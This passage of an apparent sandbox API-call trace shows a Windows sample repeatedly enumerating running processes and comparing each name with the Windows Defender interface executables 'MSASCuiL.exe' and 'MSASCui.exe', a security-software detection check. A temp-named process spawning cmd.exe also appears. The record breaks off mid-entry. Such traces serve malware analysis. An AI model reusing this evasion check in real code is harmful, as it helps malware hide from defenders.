[0120.024] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wonder_transmit_petersburg.exe")) returned 1 [0120.025] lstrcmpiW (lpString1="wonder_transmit_petersburg.exe", lpString2="MSASCuiL.exe") returned 1 [0120.025] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0120.026] lstrcmpiW (lpString1="WINWORD.EXE", lpString2="MSASCuiL.exe") returned 1 [0120.026] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.026] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0120.026] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0120.027] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="MSASCuiL.exe") returned 1 [0120.027] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0120.028] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MSASCuiL.exe") returned 1 [0120.028] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.029] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCuiL.exe") returned 1 [0120.029] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa80, pcPriClassBase=8, dwFlags=0x0, szExeFile="tmp6149.exe")) returned 1 [0120.029] lstrcmpiW (lpString1="tmp6149.exe", lpString2="MSASCuiL.exe") returned 1 [0120.030] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x698, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0120.030] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCuiL.exe") returned -1 [0120.030] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x698, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0120.031] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCuiL.exe") returned -1 [0120.031] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0120.032] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCuiL.exe") returned -1 [0120.032] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0120.033] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCuiL.exe") returned -1 [0120.033] Process32NextW (in: hSnapshot=0x128, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0120.033] CloseHandle (hObject=0x128) returned 1 [0120.033] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x12c [0120.037] Process32FirstW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0120.038] lstrcmpiW (lpString1="[System Process]", lpString2="MSASCui.exe") returned -1 [0120.038] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0120.038] lstrcmpiW (lpString1="System", lpString2="MSASCui.exe") returned 1 [0120.038] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0120.039] lstrcmpiW (lpString1="smss.exe", lpString2="MSASCui.exe") returned 1 [0120.039] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0120.039] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCui.exe") returned -1 [0120.039] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0120.040] lstrcmpiW (lpString1="wininit.exe", lpString2="MSASCui.exe") returned 1 [0120.040] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0120.040] lstrcmpiW (lpString1="csrss.exe", lpString2="MSASCui.exe") returned -1 [0120.040] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0120.041] lstrcmpiW (lpString1="winlogon.exe", lpString2="MSASCui.exe") returned 1 [0120.041] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0120.042] lstrcmpiW (lpString1="services.exe", lpString2="MSASCui.exe") returned 1 [0120.042] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0120.042] lstrcmpiW (lpString1="lsass.exe", lpString2="MSASCui.exe") returned -1 [0120.042] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0120.043] lstrcmpiW (lpString1="lsm.exe", lpString2="MSASCui.exe") returned -1 [0120.043] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.044] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0120.044] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.044] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0120.045] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.045] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0120.045] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.046] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0120.046] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.047] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0120.047] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0120.048] lstrcmpiW (lpString1="audiodg.exe", lpString2="MSASCui.exe") returned -1 [0120.048] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.049] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0120.049] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0120.050] lstrcmpiW (lpString1="explorer.exe", lpString2="MSASCui.exe") returned -1 [0120.050] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0120.051] lstrcmpiW (lpString1="dwm.exe", lpString2="MSASCui.exe") returned -1 [0120.051] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.052] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0120.052] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0120.054] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MSASCui.exe") returned 1 [0120.054] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0120.055] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCui.exe") returned 1 [0120.055] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.056] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0120.056] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0120.057] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="MSASCui.exe") returned 1 [0120.057] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0120.058] lstrcmpiW (lpString1="taskeng.exe", lpString2="MSASCui.exe") returned 1 [0120.058] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0120.059] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="MSASCui.exe") returned 1 [0120.059] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0120.059] lstrcmpiW (lpString1="taskhost.exe", lpString2="MSASCui.exe") returned 1 [0120.059] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="measurements-cocktail-motivation.exe")) returned 1 [0120.060] lstrcmpiW (lpString1="measurements-cocktail-motivation.exe", lpString2="MSASCui.exe") returned -1 [0120.060] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x578, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur_travelling_usage.exe")) returned 1 [0120.061] lstrcmpiW (lpString1="arthur_travelling_usage.exe", lpString2="MSASCui.exe") returned -1 [0120.061] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zdnet.exe")) returned 1 [0120.062] lstrcmpiW (lpString1="zdnet.exe", lpString2="MSASCui.exe") returned 1 [0120.062] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zufilmenyc.exe")) returned 1 [0120.063] lstrcmpiW (lpString1="zufilmenyc.exe", lpString2="MSASCui.exe") returned 1 [0120.063] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bangbus.exe")) returned 1 [0120.064] lstrcmpiW (lpString1="bangbus.exe", lpString2="MSASCui.exe") returned -1 [0120.064] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dee_flour.exe")) returned 1 [0120.065] lstrcmpiW (lpString1="dee_flour.exe", lpString2="MSASCui.exe") returned -1 [0120.065] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="expressionmed.exe")) returned 1 [0120.066] lstrcmpiW (lpString1="expressionmed.exe", lpString2="MSASCui.exe") returned -1 [0120.066] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="inclusive.exe")) returned 1 [0120.066] lstrcmpiW (lpString1="inclusive.exe", lpString2="MSASCui.exe") returned -1 [0120.066] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x740, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovation-painful-resulting.exe")) returned 1 [0120.067] lstrcmpiW (lpString1="innovation-painful-resulting.exe", lpString2="MSASCui.exe") returned -1 [0120.067] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="political-guide.exe")) returned 1 [0120.068] lstrcmpiW (lpString1="political-guide.exe", lpString2="MSASCui.exe") returned 1 [0120.068] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blvd.exe")) returned 1 [0120.069] lstrcmpiW (lpString1="blvd.exe", lpString2="MSASCui.exe") returned -1 [0120.069] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mails_users.exe")) returned 1 [0120.070] lstrcmpiW (lpString1="mails_users.exe", lpString2="MSASCui.exe") returned -1 [0120.070] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trading.exe")) returned 1 [0120.071] lstrcmpiW (lpString1="trading.exe", lpString2="MSASCui.exe") returned 1 [0120.071] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="declare.exe")) returned 1 [0120.072] lstrcmpiW (lpString1="declare.exe", lpString2="MSASCui.exe") returned -1 [0120.072] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sake_psp.exe")) returned 1 [0120.072] lstrcmpiW (lpString1="sake_psp.exe", lpString2="MSASCui.exe") returned 1 [0120.072] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="renewable-loss-purpose.exe")) returned 1 [0120.073] lstrcmpiW (lpString1="renewable-loss-purpose.exe", lpString2="MSASCui.exe") returned 1 [0120.073] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation large.exe")) returned 1 [0120.074] lstrcmpiW (lpString1="nation large.exe", lpString2="MSASCui.exe") returned 1 [0120.074] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conflicts_thermal_himself.exe")) returned 1 [0120.075] lstrcmpiW (lpString1="conflicts_thermal_himself.exe", lpString2="MSASCui.exe") returned -1 [0120.075] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wonder_transmit_petersburg.exe")) returned 1 [0120.075] lstrcmpiW (lpString1="wonder_transmit_petersburg.exe", lpString2="MSASCui.exe") returned 1 [0120.075] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0120.076] lstrcmpiW (lpString1="WINWORD.EXE", lpString2="MSASCui.exe") returned 1 [0120.076] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.077] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0120.077] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0120.078] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="MSASCui.exe") returned 1 [0120.078] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0120.078] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MSASCui.exe") returned 1 [0120.078] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0120.079] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0120.079] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa80, pcPriClassBase=8, dwFlags=0x0, szExeFile="tmp6149.exe")) returned 1 [0120.080] lstrcmpiW (lpString1="tmp6149.exe", lpString2="MSASCui.exe") returned 1 [0120.080] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x698, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0120.081] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCui.exe") returned -1 [0120.081] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x698, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0120.082] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCui.exe") returned -1 [0120.082] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a8, 